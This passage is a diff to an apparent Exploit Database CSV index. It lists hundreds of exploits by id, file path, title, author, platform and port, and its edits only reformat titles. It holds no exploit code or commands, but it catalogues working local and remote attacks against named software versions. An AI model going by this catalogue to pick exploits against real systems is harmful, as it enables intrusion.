Exploit",2012-11-12,"Julien Ahrens",windows,local,0 22661,platforms/freebsd/local/22661.c,"Upclient 5.0 b7 - Command Line Argument Buffer Overflow",2003-05-27,"Gino Thomas",freebsd,local,0 22683,platforms/linux/local/22683.pl,"HT Editor 2.0.20 - Buffer Overflow (ROP) (PoC)",2012-11-13,ZadYree,linux,local,0 -22695,platforms/linux/local/22695.pl,"RedHat 9.0 / Slackware 8.1 - /bin/mail Carbon Copy Field Buffer Overrun",2003-05-30,mark@vulndev.org,linux,local,0 +22695,platforms/linux/local/22695.pl,"RedHat 9.0 / Slackware 8.1 - '/bin/mail' Carbon Copy Field Buffer Overrun",2003-05-30,mark@vulndev.org,linux,local,0 22703,platforms/linux/local/22703.c,"XMame 0.6x - Lang Local Buffer Overflow",2003-03-31,"Gabriel A. Maggiotti",linux,local,0 22719,platforms/linux/local/22719.pl,"kon2 - Local Buffer Overflow (1)",2003-06-03,wsxz,linux,local,0 22720,platforms/linux/local/22720.c,"kon2 - Local Buffer Overflow (2)",2003-06-03,c0ntex,linux,local,0 @@ -7973,7 +7984,7 @@ id,file,description,date,author,platform,type,port 22781,platforms/linux/local/22781.txt,"Linux PAM 0.77 - Pam_Wheel Module getlogin() 'Username' Spoofing Privilege Escalation",2003-06-16,"Karol Wiesek",linux,local,0 22806,platforms/linux/local/22806.sh,"SDFingerD 1.1 - Failure To Drop Privileges Privilege Escalation",2003-06-19,V9,linux,local,0 22811,platforms/bsd/local/22811.c,"Abuse-SDL 0.7 - Command-Line Argument Buffer Overflow",2003-06-19,Matrix_DK,bsd,local,0 -22813,platforms/linux/local/22813.c,"Linux Kernel 2.2.x / 2.4.x - /proc Filesystem Potential Information Disclosure",2003-06-20,IhaQueR,linux,local,0 +22813,platforms/linux/local/22813.c,"Linux Kernel 2.2.x / 2.4.x - '/proc' Filesystem Potential Information Disclosure",2003-06-20,IhaQueR,linux,local,0 22815,platforms/linux/local/22815.c,"GNU GNATS 3.113 - Environment Variable Buffer Overflow",2003-06-21,Xpl017Elz,linux,local,0 40409,platforms/windows/local/40409.txt,"Microsoft Windows Kerberos - Security Feature Bypass (MS16-101)",2016-09-22,"Nabeel Ahmed",windows,local,0 22835,platforms/windows/local/22835.c,"Tripbit Secure Code Analizer 1.0 - Local fgets() Buffer Overrun",2003-06-24,posidron,windows,local,0 @@ -7985,16 +7996,16 @@ id,file,description,date,author,platform,type,port 22861,platforms/linux/local/22861.c,"GNU AN - Local Command Line Option Buffer Overflow",2003-07-03,ace,linux,local,0 22862,platforms/linux/local/22862.c,"ISDNRep 4.56 - Command Line Argument Local Buffer Overflow (1)",2003-07-03,ace,linux,local,0 22863,platforms/linux/local/22863.c,"ISDNRep 4.56 - Command Line Argument Local Buffer Overflow (2)",2003-07-04,snooq,linux,local,0 -22870,platforms/windows/local/22870.txt,"Microsoft Windows XP/2000 - RunDLL32.exe Buffer Overflow",2003-07-06,"Rick Patel",windows,local,0 +22870,platforms/windows/local/22870.txt,"Microsoft Windows XP/2000 - 'RunDLL32.exe' Buffer Overflow",2003-07-06,"Rick Patel",windows,local,0 23037,platforms/windows/local/23037.txt,"DWebPro 3.4.1 - Http.ini Plaintext Password Storage",2003-08-18,rUgg1n3,windows,local,0 22882,platforms/windows/local/22882.c,"Microsoft Windows Server 2000 - CreateFile API Named Pipe Privilege Escalation (1)",2003-07-08,Maceo,windows,local,0 22883,platforms/windows/local/22883.c,"Microsoft Windows Server 2000 - CreateFile API Named Pipe Privilege Escalation (2)",2003-07-08,Maceo,windows,local,0 -22884,platforms/linux/local/22884.c,"Tower Toppler 0.96 - HOME Environment Variable Local Buffer Overflow",2003-07-08,FBHowns,linux,local,0 +22884,platforms/linux/local/22884.c,"Tower Toppler 0.96 - 'HOME Environment' Parameter Local Buffer Overflow",2003-07-08,FBHowns,linux,local,0 22911,platforms/php/local/22911.php,"PHP 4.3.x - Undefined Safe_Mode_Include_Dir Safemode Bypass",2003-07-16,"Michal Krause",php,local,0 22912,platforms/unix/local/22912.c,"IBM UniVerse 10.0.0.9 - uvadmsh Privilege Escalation",2003-07-16,kf,unix,local,0 -22943,platforms/linux/local/22943.c,"Top 1.x/2.0 - Home Environment Variable Local Buffer Overflow",2003-07-22,UHAGr,linux,local,0 +22943,platforms/linux/local/22943.c,"Top 1.x/2.0 - 'Home Environment' Parameter Local Buffer Overflow",2003-07-22,UHAGr,linux,local,0 22946,platforms/windows/local/22946.txt,"MySQL AB ODBC Driver 3.51 - Plain Text Password",2003-07-22,hanez,windows,local,0 -22965,platforms/linux/local/22965.c,"XBlast 2.6.1 - HOME Environment Variable Buffer Overflow",2003-07-28,c0wboy,linux,local,0 +22965,platforms/linux/local/22965.c,"XBlast 2.6.1 - 'HOME Environment' Variable Buffer Overflow",2003-07-28,c0wboy,linux,local,0 22923,platforms/unix/local/22923.c,"Tolis Group BRU 17.0 - Privilege Escalation (1)",2003-07-16,DVDMAN,unix,local,0 22924,platforms/unix/local/22924.c,"Tolis Group BRU 17.0 - Privilege Escalation (2)",2003-07-16,nic,unix,local,0 22928,platforms/linux/local/22928.pl,"mcrypt 2.5.8 - Stack Based Overflow",2012-11-26,Tosh,linux,local,0 @@ -8010,7 +8021,7 @@ id,file,description,date,author,platform,type,port 22988,platforms/unix/local/22988.sh,"IBM DB2 db2job - File Overwrite",2003-08-05,"Juan Manuel Pascual Escribá",unix,local,0 22989,platforms/unix/local/22989.pl,"IBM DB2 - Shared Library Injection",2003-08-05,daniels@legend.co.uk,unix,local,0 22993,platforms/linux/local/22993.txt,"IPNetSentryX / IPNetMonitorX - Unauthorized Network Reconnaissance",2003-07-07,@stake,linux,local,0 -22996,platforms/linux/local/22996.c,"XPCD 2.0.8 - Home Environment Variable Local Buffer Overflow",2003-07-18,r-code,linux,local,0 +22996,platforms/linux/local/22996.c,"XPCD 2.0.8 - 'Home Environment' Variable Local Buffer Overflow",2003-07-18,r-code,linux,local,0 23022,platforms/php/local/23022.c,"PHP 4.x - DLOpen Memory Disclosure (1)",2003-08-13,"Andrew Griffiths",php,local,0 23023,platforms/php/local/23023.c,"PHP 4.x - DLOpen Memory Disclosure (2)",2003-08-13,andrewg,php,local,0 23041,platforms/windows/local/23041.txt,"DeskSoft CheckMail 1.2 - Password Disclosure",2003-08-19,"cyber talon",windows,local,0 @@ -8057,7 +8068,7 @@ id,file,description,date,author,platform,type,port 23479,platforms/linux/local/23479.sh,"GNU Indent 2.2.9 - Local Heap Overflow",2003-12-26,"Pooh Hacking Squadron",linux,local,0 23481,platforms/linux/local/23481.c,"Apache 2.0.4x mod_php - File Descriptor Leakage (1)",2003-12-26,"Steve Grubb",linux,local,0 23482,platforms/linux/local/23482.c,"Apache 2.0.4x mod_php - File Descriptor Leakage (2)",2003-12-26,"frauk\x41ser",linux,local,0 -23510,platforms/linux/local/23510.c,"XSOK 1.0 2 - LANG Environment Variable Local Buffer Overrun",2003-12-30,N2n-Hacker,linux,local,0 +23510,platforms/linux/local/23510.c,"XSOK 1.0 2 - 'LANG Environment' Variable Local Buffer Overrun",2003-12-30,N2n-Hacker,linux,local,0 23511,platforms/windows/local/23511.txt,"Surfnet 1.31 - Unauthorized Account Depositing",2004-01-02,Rift_XT,windows,local,0 23581,platforms/linux/local/23581.pl,"Apache 2.0.4x mod_perl - File Descriptor Leakage (3)",2004-01-21,"Steve Grubb",linux,local,0 23609,platforms/unix/local/23609.sh,"IBM Informix Dynamic Server 9.40/Informix Extended Parallel Server 8.40 - Multiple Vulnerabilities (1)",2003-08-08,pask,unix,local,0 @@ -8114,7 +8125,7 @@ id,file,description,date,author,platform,type,port 24406,platforms/linux/local/24406.txt,"GNU a2ps 4.13 - File Name Command Execution",2004-08-24,"Rudolf Polzer",linux,local,0 24421,platforms/linux/local/24421.c,"Debian bsdmainutils 6.0.14 - Calendar Information Disclosure",2004-08-31,"Steven Van Acker",linux,local,0 24458,platforms/linux/local/24458.txt,"Oracle Automated Service Manager 1.3 - Installation Privilege Escalation",2013-02-05,"Larry W. Cashdollar",linux,local,0 -24459,platforms/linux/local/24459.sh,"Linux Kernel 2.6.32-5 (Debian 6.0.5) - /dev/ptmx Key Stroke Timing Local Disclosure",2013-02-05,vladz,linux,local,0 +24459,platforms/linux/local/24459.sh,"Linux Kernel 2.6.32-5 (Debian 6.0.5) - '/dev/ptmx' Key Stroke Timing Local Disclosure",2013-02-05,vladz,linux,local,0 24505,platforms/windows/local/24505.py,"Photodex ProShow Producer 5.0.3297 - '.pxs' Memory Corruption",2013-02-15,"Julien Ahrens",windows,local,0 24555,platforms/lin_x86-64/local/24555.c,"Linux Kernel < 3.3.x < 3.7.x (Arch Linux x86-64) - 'sock_diag_handlers[]' Privilege Escalation (1)",2013-02-27,sd,lin_x86-64,local,0 24570,platforms/linux/local/24570.txt,"QNX PPPoEd 2.4/4.25/6.2 - Path Environment Variable Local Command Execution",2004-09-03,"Julio Cesar Fort",linux,local,0 @@ -8333,7 +8344,7 @@ id,file,description,date,author,platform,type,port 29881,platforms/windows/local/29881.txt,"Adobe Acrobat Reader - ASLR + DEP Bypass with Sandbox Bypass",2013-11-28,"w3bd3vil and abh1sek",windows,local,0 29922,platforms/windows/local/29922.py,"Kingsoft Office Writer 2012 8.1.0.3385 - '.wps' Buffer Overflow (SEH)",2013-11-30,"Julien Ahrens",windows,local,0 29950,platforms/osx/local/29950.js,"Apple 2.0.4 - Safari Unspecified Local",2007-05-04,poplix,osx,local,0 -29954,platforms/linux/local/29954.txt,"ELinks Relative 0.10.6 - /011.1 Path Arbitrary Code Execution",2007-05-07,"Arnaud Giersch",linux,local,0 +29954,platforms/linux/local/29954.txt,"ELinks Relative 0.10.6 / 011.1 - Path Arbitrary Code Execution",2007-05-07,"Arnaud Giersch",linux,local,0 30007,platforms/windows/local/30007.txt,"Notepad++ Plugin Notepad 1.5 - Local Exploit",2013-12-03,"Junwen Sun",windows,local,0 30096,platforms/osx/local/30096.txt,"Apple Mac OSX 10.4.9 - VPND Local Format String",2007-05-29,"Chris Anley",osx,local,0 30237,platforms/hardware/local/30237.sh,"Cisco Unified Communications Manager - TFTP Service",2013-12-12,"daniel svartman",hardware,local,0 @@ -8759,7 +8770,7 @@ id,file,description,date,author,platform,type,port 39260,platforms/windows/local/39260.txt,"WEG SuperDrive G2 12.0.0 - Insecure File Permissions",2016-01-18,LiquidWorm,windows,local,0 39277,platforms/linux/local/39277.c,"Linux Kernel 4.4.1 - REFCOUNT Overflow/Use-After-Free in Keyrings Privilege Escalation (1)",2016-01-19,"Perception Point Team",linux,local,0 40003,platforms/linux/local/40003.c,"Linux Kernel 4.4.1 - REFCOUNT Overflow/Use-After-Free in Keyrings Privilege Escalation (2)",2016-01-19,"Federico Bento",linux,local,0 -39284,platforms/windows/local/39284.txt,"Oracle - HtmlConverter.exe Buffer Overflow",2016-01-21,hyp3rlinx,windows,local,0 +39284,platforms/windows/local/39284.txt,"Oracle - 'HtmlConverter.exe' Buffer Overflow",2016-01-21,hyp3rlinx,windows,local,0 39285,platforms/linux/local/39285.py,"xWPE 1.5.30a-2.1 - Local Buffer Overflow",2016-01-21,"Juan Sacco",linux,local,0 40337,platforms/win_x86-64/local/40337.py,"MySQL 5.5.45 (x64) - Local Credentials Disclosure",2016-09-05,"Yakir Wizman",win_x86-64,local,0 39310,platforms/windows/local/39310.txt,"Microsoft Windows - Sandboxed Mount Reparse Point Creation Mitigation Bypass Redux (MS16-008) (2)",2016-01-25,"Google Security Research",windows,local,0 @@ -9030,7 +9041,7 @@ id,file,description,date,author,platform,type,port 41764,platforms/linux/local/41764.txt,"NTP - Privilege Escalation",2016-01-21,halfdog,linux,local,0 41765,platforms/linux/local/41765.txt,"Ubuntu 15.04 (Development) - 'Upstart' Logrotation Privilege Escalation",2015-03-12,halfdog,linux,local,0 41766,platforms/linux/local/41766.txt,"Vm86 - Syscall Task Switch Kernel Panic / Privilege Escalation",2012-10-19,halfdog,linux,local,0 -41770,platforms/linux/local/41770.txt,"Linux Kernel 2.6.32 (Ubuntu 10.04) - /proc Handling SUID Privilege Escalation",2011-01-17,halfdog,linux,local,0 +41770,platforms/linux/local/41770.txt,"Linux Kernel 2.6.32 (Ubuntu 10.04) - '/proc' Handling SUID Privilege Escalation",2011-01-17,halfdog,linux,local,0 41771,platforms/windows/local/41771.py,"Disk Sorter Enterprise 9.5.12 - 'Import Command' Buffer Overflow",2017-03-29,"Daniel Teixeira",windows,local,0 41772,platforms/windows/local/41772.py,"DiskBoss Enterprise 7.8.16 - 'Import Command' Buffer Overflow",2017-03-29,"Daniel Teixeira",windows,local,0 41773,platforms/windows/local/41773.py,"Sync Breeze Enterprise 9.5.16 - 'Import Command' Buffer Overflow",2017-03-29,"Daniel Teixeira",windows,local,0 @@ -9132,7 +9143,7 @@ id,file,description,date,author,platform,type,port 84,platforms/linux/remote/84.c,"Gopherd 3.0.5 - FTP Gateway Remote Overflow",2003-08-22,vade79,linux,remote,70 86,platforms/multiple/remote/86.c,"Real Server 7/8/9 (Windows / Linux) - Remote Code Execution",2003-08-25,"Johnny Cyberpunk",multiple,remote,554 88,platforms/linux/remote/88.c,"GtkFtpd 1.0.4 - Buffer Overflow",2003-08-28,vade79,linux,remote,21 -89,platforms/linux/remote/89.c,"Linux pam_lib_smb < 1.1.6 - /bin/login Remote Exploit",2003-08-29,vertex,linux,remote,23 +89,platforms/linux/remote/89.c,"Linux pam_lib_smb < 1.1.6 - '/bin/login' Remote Exploit",2003-08-29,vertex,linux,remote,23 90,platforms/windows/remote/90.c,"eMule/xMule/LMule - OP_SERVERMESSAGE Format String",2003-09-01,"Rémi Denis-Courmont",windows,remote,4661 92,platforms/windows/remote/92.c,"Microsoft WordPerfect Document Converter - Exploit (MS03-036)",2003-09-06,valgasu,windows,remote,0 95,platforms/multiple/remote/95.c,"Roger Wilco 1.x - Client Data Buffer Overflow",2003-09-10,"Luigi Auriemma",multiple,remote,0 @@ -9559,7 +9570,7 @@ id,file,description,date,author,platform,type,port 2048,platforms/hardware/remote/2048.pl,"Cisco/Protego CS-MARS < 4.2.1 - (JBoss) Remote Code Execution",2006-07-20,"Jon Hart",hardware,remote,0 2052,platforms/windows/remote/2052.sh,"Microsoft Internet Explorer - (MDAC) Remote Code Execution (MS06-014)",2006-07-21,redsand,windows,remote,0 2053,platforms/multiple/remote/2053.rb,"Cyrus IMAPD 2.3.2 - 'pop3d' Remote Buffer Overflow (2)",2006-07-21,bannedit,multiple,remote,110 -2054,platforms/windows/remote/2054.txt,"Microsoft Windows - DHCP Client Broadcast Attack Exploit (MS06-036)",2006-07-21,redsand,windows,remote,0 +2054,platforms/windows/remote/2054.txt,"Microsoft Windows - DHCP Client Broadcast Exploit (MS06-036)",2006-07-21,redsand,windows,remote,0 2061,platforms/multiple/remote/2061.txt,"Apache Tomcat < 5.5.17 - Remote Directory Listing",2006-07-23,"ScanAlert Security",multiple,remote,0 2070,platforms/windows/remote/2070.pl,"SIPfoundry sipXtapi - (CSeq) Remote Buffer Overflow",2006-07-24,"Jacopo Cervini",windows,remote,5060 2074,platforms/windows/remote/2074.pm,"eIQnetworks License Manager - Remote Buffer Overflow (Metasploit) (1)",2006-07-26,ri0t,windows,remote,10616 @@ -9603,7 +9614,7 @@ id,file,description,date,author,platform,type,port 2530,platforms/windows/remote/2530.py,"BulletProof FTP Client 2.45 - Remote Buffer Overflow (PoC)",2006-10-12,h07,windows,remote,0 2601,platforms/windows/remote/2601.c,"Ipswitch IMail Server 2006 / 8.x - (RCPT) Remote Stack Overflow",2006-10-19,"Greg Linares",windows,remote,25 2637,platforms/windows/remote/2637.c,"AEP SmartGate 4.3b - (GET) Arbitrary File Download Exploit",2006-10-24,prdelka,windows,remote,143 -2638,platforms/hardware/remote/2638.c,"Cisco VPN 3000 Concentrator 4.1.7 / 4.7.2 - (FTP) Remote Exploit",2006-10-24,prdelka,hardware,remote,0 +2638,platforms/hardware/remote/2638.c,"Cisco VPN 3000 Concentrator 4.1.7 / 4.7.2 - 'FTP' Remote Exploit",2006-10-24,prdelka,hardware,remote,0 2649,platforms/windows/remote/2649.c,"QK SMTP 3.01 - (RCPT TO) Remote Buffer Overflow (1)",2006-10-25,Expanders,windows,remote,25 2651,platforms/windows/remote/2651.c,"MiniHTTPServer Web Forum & File Sharing Server 4.0 - Add User Exploit",2006-10-25,"Greg Linares",windows,remote,0 2657,platforms/windows/remote/2657.html,"Microsoft Internet Explorer 7 - Popup Address Bar Spoofing",2006-10-26,anonymous,windows,remote,0 @@ -9634,7 +9645,7 @@ id,file,description,date,author,platform,type,port 2933,platforms/linux/remote/2933.c,"OpenLDAP 2.4.3 - (KBIND) Remote Buffer Overflow",2006-12-15,"Solar Eclipse",linux,remote,389 2936,platforms/linux/remote/2936.pl,"GNU InetUtils ftpd 1.4.2 - 'ld.so.preload' Remote Code Execution",2006-12-15,kingcope,linux,remote,21 2951,platforms/multiple/remote/2951.sql,"Oracle 9i / 10g (extproc) - Local / Remote Command Execution",2006-12-19,"Marco Ivaldi",multiple,remote,0 -2959,platforms/linux/remote/2959.sql,"Oracle 9i / 10g - 'utl_file' File System Access Exploit",2006-12-19,"Marco Ivaldi",linux,remote,0 +2959,platforms/linux/remote/2959.sql,"Oracle 9i / 10g - 'utl_file' FileSystem Access Exploit",2006-12-19,"Marco Ivaldi",linux,remote,0 2974,platforms/windows/remote/2974.pl,"Http explorer Web Server 1.02 - Directory Traversal",2006-12-21,str0ke,windows,remote,0 3021,platforms/linux/remote/3021.txt,"ProFTPd 1.2.9 rc2 - ASCII File Remote Code Execution (2)",2003-10-15,"Solar Eclipse",linux,remote,21 3022,platforms/windows/remote/3022.txt,"Microsoft Windows - ASN.1 Remote Exploit (MS04-007)",2004-03-26,"Solar Eclipse",windows,remote,445 @@ -10021,7 +10032,7 @@ id,file,description,date,author,platform,type,port 5398,platforms/windows/remote/5398.html,"Tumbleweed SecureTransport 4.6.1 FileTransfer - ActiveX Buffer Overflow",2008-04-07,"Patrick Webster",windows,remote,0 5416,platforms/windows/remote/5416.html,"IBiz E-Banking Integrator 2.0 - ActiveX Edition Insecure Method Exploit",2008-04-09,shinnai,windows,remote,0 5430,platforms/multiple/remote/5430.txt,"HP OpenView Network Node Manager 7.53 - Multiple Vulnerabilities",2008-04-11,"Luigi Auriemma",multiple,remote,0 -5445,platforms/windows/remote/5445.cpp,"HP OpenView Network Node Manager (OV NNM) 7.5.1 - ovalarmsrv.exe Remote Overflow",2008-04-14,Heretic2,windows,remote,2954 +5445,platforms/windows/remote/5445.cpp,"HP OpenView Network Node Manager (OV NNM) 7.5.1 - 'ovalarmsrv.exe' Remote Overflow",2008-04-14,Heretic2,windows,remote,2954 5451,platforms/windows/remote/5451.py,"BigAnt Server 2.2 - Unauthenticated Remote Overflow (SEH)",2008-04-15,ryujin,windows,remote,6080 5461,platforms/windows/remote/5461.rb,"Intel Centrino ipw2200BG - Wireless Driver Remote Buffer Overflow (Metasploit)",2008-04-17,oveRet,windows,remote,0 5489,platforms/windows/remote/5489.html,"Zune Software - ActiveX Arbitrary File Overwrite",2008-04-23,"ilion security",windows,remote,0 @@ -10071,7 +10082,7 @@ id,file,description,date,author,platform,type,port 6130,platforms/multiple/remote/6130.c,"BIND 9.x - Remote DNS Cache Poisoning Flaw Exploit",2008-07-25,"Marc Bevand",multiple,remote,0 6151,platforms/windows/remote/6151.txt,"velocity Web-Server 1.0 - Directory Traversal",2008-07-28,DSecRG,windows,remote,0 6152,platforms/windows/remote/6152.html,"Trend Micro OfficeScan - ObjRemoveCtrl ActiveX Control Buffer Overflow",2008-07-28,Elazar,windows,remote,0 -6155,platforms/hardware/remote/6155.c,"Cisco IOS 12.3(18) FTP Server - Remote Exploit (attached to gdb)",2008-07-29,"Andy Davis",hardware,remote,0 +6155,platforms/hardware/remote/6155.c,"Cisco IOS 12.3(18) - FTP Server Remote Exploit (Attached to GDB)",2008-07-29,"Andy Davis",hardware,remote,0 6175,platforms/windows/remote/6175.html,"NCTsoft - 'AudFile.dll' ActiveX Control Remote Buffer Overflow",2008-07-31,shinnai,windows,remote,0 6195,platforms/windows/remote/6195.c,"IntelliTamper 2.07 - (imgsrc) Remote Buffer Overflow",2008-08-03,r0ut3r,windows,remote,0 6217,platforms/windows/remote/6217.pl,"BlazeDVD 5.0 - PLF Playlist File Remote Buffer Overflow",2008-08-10,LiquidWorm,windows,remote,0 @@ -10102,7 +10113,7 @@ id,file,description,date,author,platform,type,port 6477,platforms/hardware/remote/6477.html,"Cisco Router - HTTP Administration Cross-Site Request Forgery / Command Execution (2)",2008-09-17,"Jeremy Brown",hardware,remote,0 6491,platforms/windows/remote/6491.html,"NuMedia Soft Nms DVD Burning SDK ActiveX - 'NMSDVDX.dll' Exploit",2008-09-19,Nine:Situations:Group,windows,remote,0 6506,platforms/windows/remote/6506.txt,"Unreal Tournament 3 1.3 - Directory Traversal",2008-09-21,"Luigi Auriemma",windows,remote,0 -6532,platforms/hardware/remote/6532.py,"Sagem F@ST (Routers) - (dhcp hostname attack) Cross-Site Request Forgery",2008-09-22,Zigma,hardware,remote,0 +6532,platforms/hardware/remote/6532.py,"Sagem F@ST Routers - DHCP Hostname Cross-Site Request Forgery",2008-09-22,Zigma,hardware,remote,0 6537,platforms/windows/remote/6537.html,"Chilkat XML - ActiveX Arbitrary File Creation/Execution Exploit",2008-09-23,shinnai,windows,remote,0 6548,platforms/windows/remote/6548.html,"BurnAware - NMSDVDXU ActiveX Arbitrary File Creation/Execution",2008-09-24,shinnai,windows,remote,0 6570,platforms/windows/remote/6570.rb,"ICONICS Vessel / Gauge / Switch 8.02.140 - ActiveX Buffer Overflow (Metasploit)",2008-09-25,"Kevin Finisterre",windows,remote,0 @@ -10114,7 +10125,7 @@ id,file,description,date,author,platform,type,port 6666,platforms/windows/remote/6666.pl,"mIRC 6.34 - Remote Buffer Overflow",2008-10-04,SkD,windows,remote,0 6686,platforms/windows/remote/6686.txt,"hammer software metagauge 1.0.0.17 - Directory Traversal",2008-10-06,"Brad Antoniewicz",windows,remote,0 6690,platforms/windows/remote/6690.html,"Skype extension for Firefox Beta 2.2.0.95 - Clipboard Writing",2008-10-07,irk4z,windows,remote,0 -6699,platforms/windows/remote/6699.html,"Microsoft PicturePusher - ActiveX Cross-Site Arbitrary File Upload Attack (PoC)",2008-10-08,Nine:Situations:Group,windows,remote,0 +6699,platforms/windows/remote/6699.html,"Microsoft PicturePusher - ActiveX Cross-Site Arbitrary File Upload (PoC)",2008-10-08,Nine:Situations:Group,windows,remote,0 6750,platforms/hardware/remote/6750.txt,"Telecom Italia Alice Pirelli routers - Backdoor from internal LAN/WAN",2008-10-14,"saxdax & drpepperONE",hardware,remote,0 6773,platforms/windows/remote/6773.html,"Hummingbird Deployment Wizard 2008 - ActiveX Command Execution",2008-10-17,shinnai,windows,remote,0 6774,platforms/windows/remote/6774.html,"Hummingbird Deployment Wizard 2008 - Registry Values Creation/Change",2008-10-17,shinnai,windows,remote,0 @@ -10140,7 +10151,7 @@ id,file,description,date,author,platform,type,port 7055,platforms/hardware/remote/7055.txt,"SpeedStream 5200 - Authentication Bypass Config Download",2008-11-07,hkm,hardware,remote,0 7056,platforms/windows/remote/7056.rb,"GE Proficy Real Time Information Portal - Credentials Leak Sniffer (Metasploit)",2008-11-08,"Kevin Finisterre",windows,remote,0 7104,platforms/windows/remote/7104.c,"Microsoft Windows Server - Code Execution (MS08-067)",2008-11-12,Polymorphours,windows,remote,135 -7125,platforms/windows/remote/7125.txt,"Microsoft Windows - SmbRelay3 NTLM Replay Attack Tool/Exploit (MS08-068)",2008-11-14,"Andres Tarasco",windows,remote,0 +7125,platforms/windows/remote/7125.txt,"Microsoft Windows - SmbRelay3 NTLM Replay Exploit (MS08-068)",2008-11-14,"Andres Tarasco",windows,remote,0 7132,platforms/windows/remote/7132.py,"Microsoft Windows Server 2000/2003 - Code Execution (MS08-067)",2008-11-16,"Debasis Mohanty",windows,remote,445 7142,platforms/windows/remote/7142.html,"Chilkat Socket ActiveX 2.3.1.1 - Arbitrary File Creation",2008-11-17,Zigma,windows,remote,0 7145,platforms/windows/remote/7145.txt,"Exodus 0.10 - (URI handler) Arbitrary Parameter Injection (1)",2008-11-17,Nine:Situations:Group,windows,remote,0 @@ -10215,7 +10226,7 @@ id,file,description,date,author,platform,type,port 8079,platforms/windows/remote/8079.html,"Microsoft Internet Explorer 7 (Windows XP SP2) - Memory Corruption (MS09-002)",2009-02-20,Abysssec,windows,remote,0 8080,platforms/windows/remote/8080.py,"Microsoft Internet Explorer 7 - Memory Corruption (MS09-002) (Python)",2009-02-20,"David Kennedy (ReL1K)",windows,remote,0 8082,platforms/windows/remote/8082.html,"Microsoft Internet Explorer 7 (Windows 2003 SP2) - Memory Corruption (PoC) (MS09-002)",2009-02-20,webDEViL,windows,remote,0 -8096,platforms/hardware/remote/8096.txt,"Optus/Huawei E960 HSDPA Router - Sms Cross-Site Scripting Attack",2009-02-23,"Rizki Wicaksono",hardware,remote,0 +8096,platforms/hardware/remote/8096.txt,"Optus/Huawei E960 HSDPA Router - Sms Cross-Site Scripting",2009-02-23,"Rizki Wicaksono",hardware,remote,0 8097,platforms/multiple/remote/8097.txt,"MLdonkey 2.9.7 - Arbitrary File Disclosure",2009-02-23,"Michael Peselnik",multiple,remote,0 8117,platforms/windows/remote/8117.pl,"POP Peeper 3.4.0.0 - UIDL Remote Buffer Overflow (SEH)",2009-02-27,"Jeremy Brown",windows,remote,0 8118,platforms/windows/remote/8118.html,"Orbit Downloader 2.8.4 - Long Hostname Remote Buffer Overflow",2009-02-27,JavaGuru,windows,remote,0 @@ -10303,13 +10314,13 @@ id,file,description,date,author,platform,type,port 8861,platforms/osx/remote/8861.rb,"Apple iTunes 8.1.1 - 'ITMS' Multiple Protocol Handler Buffer Overflow (Metasploit)",2009-06-03,"Will Drewry",osx,remote,0 8880,platforms/linux/remote/8880.txt,"kloxo 5.75 - Multiple Vulnerabilities",2009-06-04,anonymous,linux,remote,0 8897,platforms/windows/remote/8897.c,"httpdx 0.8 - FTP Server Delete/Get/Create Directories/Files Exploit",2009-06-08,"Jonathan Salwan",windows,remote,0 -8907,platforms/multiple/remote/8907.txt,"Apple Safari 3.2.x - (XXE attack) Local File Theft",2009-06-09,"Chris Evans",multiple,remote,0 +8907,platforms/multiple/remote/8907.txt,"Apple Safari 3.2.x - (XXE) Local File Theft",2009-06-09,"Chris Evans",multiple,remote,0 8916,platforms/windows/remote/8916.py,"Free Download Manager 2.5/3.0 - (Control Server) Remote Buffer Overflow",2009-06-09,His0k4,windows,remote,80 8922,platforms/windows/remote/8922.txt,"Worldweaver DX Studio Player < 3.0.29.1 Firefox plugin - Command Injection",2009-06-10,"Core Security",windows,remote,0 8930,platforms/windows/remote/8930.txt,"ModSecurity 2.5.9 (Core Rules 2.5-1.6.1) - Filter Bypass",2009-06-11,"Lavakumar Kuppan",windows,remote,0 8934,platforms/windows/remote/8934.py,"Apple iTunes 8.1.1.10 (Windows) - 'itms/itcp' Remote Buffer Overflow",2009-06-12,ryujin,windows,remote,0 8938,platforms/windows/remote/8938.txt,"Green Dam 3.17 (Windows XP SP2) - (URL) Remote Buffer Overflow",2009-06-12,seer[N.N.U],windows,remote,0 -8963,platforms/hardware/remote/8963.txt,"Netgear DG632 Router - Authentication Bypass",2009-06-15,"Tom Neaves",hardware,remote,0 +8963,platforms/hardware/remote/8963.txt,"NETGEAR DG632 Router - Authentication Bypass",2009-06-15,"Tom Neaves",hardware,remote,0 8969,platforms/windows/remote/8969.rb,"Green Dam 3.17 - URL Processing Buffer Overflow (Metasploit)",2009-06-16,Trancer,windows,remote,0 8970,platforms/windows/remote/8970.txt,"McAfee 3.6.0.608 - 'naPolicyManager.dll' ActiveX Arbitrary Data Write",2009-06-16,callAX,windows,remote,0 8986,platforms/windows/remote/8986.txt,"Edraw PDF Viewer Component < 3.2.0.126 - ActiveX Insecure Method",2009-06-18,Jambalaya,windows,remote,0 @@ -10365,7 +10376,7 @@ id,file,description,date,author,platform,type,port 9662,platforms/windows/remote/9662.c,"IPSwitch IMAP Server 9.20 - Remote Buffer Overflow",2009-09-14,dmc,windows,remote,143 9663,platforms/windows/remote/9663.py,"Mozilla Firefox 2.0.0.16 - UTF-8 URL Remote Buffer Overflow",2009-09-14,dmc,windows,remote,0 9673,platforms/windows/remote/9673.py,"BigAnt Server 2.50 - GET Request Remote Buffer Overflow (SEH)",2009-09-15,blake,windows,remote,6660 -9676,platforms/windows/remote/9676.txt,"BRS Webweaver 1.33 - /Scripts Access Restriction Bypass",2009-09-15,"Usman Saeed",windows,remote,0 +9676,platforms/windows/remote/9676.txt,"BRS Webweaver 1.33 - '/Scripts' Access Restriction Bypass",2009-09-15,"Usman Saeed",windows,remote,0 9690,platforms/windows/remote/9690.py,"BigAnt Server 2.50 - GET Request Remote Buffer Overflow (SEH) Universal",2009-09-15,hack4love,windows,remote,6660 9694,platforms/windows/remote/9694.txt,"NaviCOPA Web Server 3.01 - Source Code Disclosure",2009-09-16,Dr_IDE,windows,remote,0 9704,platforms/windows/remote/9704.html,"Quiksoft EasyMail 6.0.3.0 - imap connect() ActiveX Buffer Overflow",2009-09-17,"Sebastian Wolfgarten",windows,remote,0 @@ -10463,7 +10474,7 @@ id,file,description,date,author,platform,type,port 10053,platforms/windows/remote/10053.txt,"httpdx 1.4 - GET Request Buffer Overflow",2009-10-08,"Pankaj Kohli",windows,remote,80 10054,platforms/windows/remote/10054.txt,"SAP GUI VSFlexGrid.VSFlexGridL sp 14 - Buffer Overflow",2008-11-26,"Elazar Broad",windows,remote,0 10055,platforms/hardware/remote/10055.txt,"HP Multiple LaserJet Printer - Cross-Site Scripting",2009-07-04,sh2kerr,hardware,remote,80 